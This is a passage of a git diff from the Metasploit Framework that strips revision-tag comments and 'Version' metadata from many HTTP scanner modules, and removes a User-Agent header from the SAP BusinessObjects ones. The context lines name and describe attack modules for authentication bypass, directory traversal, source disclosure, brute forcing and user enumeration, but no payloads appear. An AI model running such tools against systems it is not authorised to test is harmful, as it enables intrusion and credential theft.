b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 80500f00f0..ce6b288c0d 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Patrick Webster ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '2936'], diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 24cc6c3d86..1f25db1cc6 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', - 'Version' => '$Revision$', 'Description' => %q{ This module tests whether a directory traversal vulnerablity is present in versions of Cisco Network Access Manager 4.8.x You may wish to change diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 176e90923f..92aaba751e 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ColdFusion Version Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts identify various flavors of ColdFusion as well as the underlying OS }, diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index db1ed88bd2..9bdb5cdc5f 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ColdFusion Server Check', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to exploit the directory traversal in the 'locale' attribute. According to the advisory the following versions are vulnerable: diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index a5e1f1a7c8..0e50dc2e32 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 5b71b8a1ce..6d50554d98 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Web Site Crawler', - 'Version' => '$Revision$', 'Description' => 'Crawl a web site and store information about what was found', 'Author' => %w(hdm tasos), 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index fe999bef2b..6d0a97093c 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Dell iDRAC default Login', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index 9a2f5b2823..934dbc3083 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary in a given directory path. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 53ddb8dd60..0127ab6f0e 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary in a given directory path. }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 00b07c63ac..6f7609e06c 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,8 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2009-1122' ], [ 'OSVDB', '54555' ], [ 'BID', '34993' ], - ], - 'Version' => '$Revision$')) + ])) register_options( [ diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index 15f821499e..62922bf205 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,8 +19,7 @@ class Metasploit3 < Msf::Auxiliary replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'mubix' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 277dd489e2..33c889dcc8 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index 7c12c8e3ef..7b7b818d21 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary Only works if PATH is differenet than '/'. }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index e684ba8d6c..dbed24a165 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary in a given directory path. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index 21d0dfb878..f280f16494 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FrontPage Server Extensions Anonymous Login Scanner', - 'Version' => '$Revision$', 'Description' => 'This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index c8ac957801..fb93096629 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'GlassFish Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to login to GlassFish instance using username and password combindations indicated by the USER_FILE, PASS_FILE, diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 45d8c69603..5a6b0ab9a6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Login Utility', - 'Version' => '$Revision$', 'Description' => 'This module attempts to authenticate to an HTTP service.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index 9bbc8b123e..5776eaf57c 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Writable Path PUT/DELETE File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 0e7b0936bd..a7fc335b15 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Version Detection', - 'Version' => '$Revision$', 'Description' => 'Display version information about each system', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index ebb13a1247..d036856766 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.projecthoneypot.org/httpbl_api.php'], diff --git a/modules/auxiliary/scanner/http/impersonate_ssl.rb b/modules/auxiliary/scanner/http/impersonate_ssl.rb index 021a4ae319..0a1f0328b0 100644 --- a/modules/auxiliary/scanner/http/impersonate_ssl.rb +++ b/modules/auxiliary/scanner/http/impersonate_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 407028750b..d6dc7c3638 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module scans a JBoss instance for a few vulnerablities. }, - 'Version' => '$Revision$', 'Author' => [ 'Tyler Krpata' ], 'References' => [ diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index db5e8fc434..9d55b38c07 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed. }, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2333' ], diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 1e03a0049e..a210e13120 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary XSS attack to redirect user browser to a attacker controller website. }, 'Author' => [ 'et' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index b1947d197b..7842159cec 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary module will attempt to download the Majordomo config.pl file. }, 'Author' => ['Nikolas Sotiriu'], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '70762'], diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index ddb666f002..a44007273a 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary files found will be displayed. }, 'Author' => [ 'diablohorn [at] gmail.com' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 8b82ba5100..9d55942f1c 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary If the webserver has mod_negotiation enabled, the IP address will be displayed. }, 'Author' => [ 'diablohorn [at] gmail.com' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 369dc94ca0..4a426c1a4f 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary protected folder requires either Basic, Digest or NTLM authentication. }, 'Author' => [ 'et', 'patrick' ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index 5f1e605b53..1a9613739e 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Nginx Source Code Disclosure/Download', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a source code disclosure/download vulnerability in versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40 diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index d2fb147ec2..52d347ecd3 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Open Proxy Detection', - 'Version' => '$Revision$', 'Description' => %q{ Checks if an HTTP proxy is open. False positive are avoided verifing the HTTP return code and matching a pattern. diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 14587cb43a..d7430ffeb6 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Options Detection', - 'Version' => '$Revision$', 'Description' => 'Display available HTTP options for each system', 'Author' => ['CG'], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index 0b4bc6cd4c..ace0a05755 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary following files /backup/files.ext . }, 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 58b490d8e9..18f166f7f9 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et [at] cyberspace.org' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) + 'License' => BSD_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index 24cc5c5cf0..4ed5920b24 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner', - 'Version' => '$Revision$', 'Description' => %q{ Scan for poorly configured reverse proxy servers. By default, this module attempts to force the server to make diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index e276f7110f..a955b4f827 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Robots.txt Content Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect robots.txt files and analize its content', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index d095e0ce50..730217ba95 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects User Bruteforcer', - 'Version' => '$Revision$', 'Description' => 'This module attempts to bruteforce SAP BusinessObjects users. The dswsbobje interface is only used to verify valid credentials for CmcApp. Therefore, any valid credentials that have been identified can be leveraged by @@ -48,11 +43,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => "/dswsbobje/services/listServices", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index 37a9d4e42b..56a6b32f1f 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects Web User Bruteforcer', - 'Version' => '$Revision$', 'Description' => 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.', 'References' => [ @@ -44,11 +39,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => "/PlatformServices/service/app/logon.object", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index d07a68648a..415ca736ee 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects User Enumeration', - 'Version' => '$Revision$', 'Description' => %Q{ This module simply attempts to enumerate SAP BusinessObjects users.The dswsbobje interface is only used to verify valid @@ -50,11 +45,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index c5e34fa11e..be3de4bd49 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects Version Detection', - 'Version' => '$Revision$', 'Description' => 'This module simply attempts to identify the version of SAP BusinessObjects.', 'References' => [ @@ -49,11 +44,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", - 'method' => 'GET', - 'headers' => { - 'User-Agent' => datastore['UserAgent'] - } - + 'method' => 'GET' }, 25) return if not res or res.code != 200 diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index d96026e52c..ee51941166 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Page Scraper', - 'Version' => '$Revision$', 'Description' => 'Scrap defined data from a specific web page based on a regular expresion', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index b0a1d89626..7f1f3a9be5 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary hidden methods. }, 'Author' => [ 'patrick' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'License' => MSF_LICENSE)) register_options( [ diff --git a/modules/auxiliary/scanner/http/sqlmap.rb b/modules/auxiliary/scanner/http/sqlmap.rb index 70722f8cf6..070f5515a6 100644 --- a/modules/auxiliary/scanner/http/sqlmap.rb +++ b/modules/auxiliary/scanner/http/sqlmap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Bernardo Damele A. G. ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://sqlmap.sourceforge.net'], diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index d90aca8404..731806c4c7 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary the attack to pivot to another part of the network). }, 'Author' => ['willis'], - 'Version' => '$Revision$', 'References' => [ 'URL','http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls' diff --git 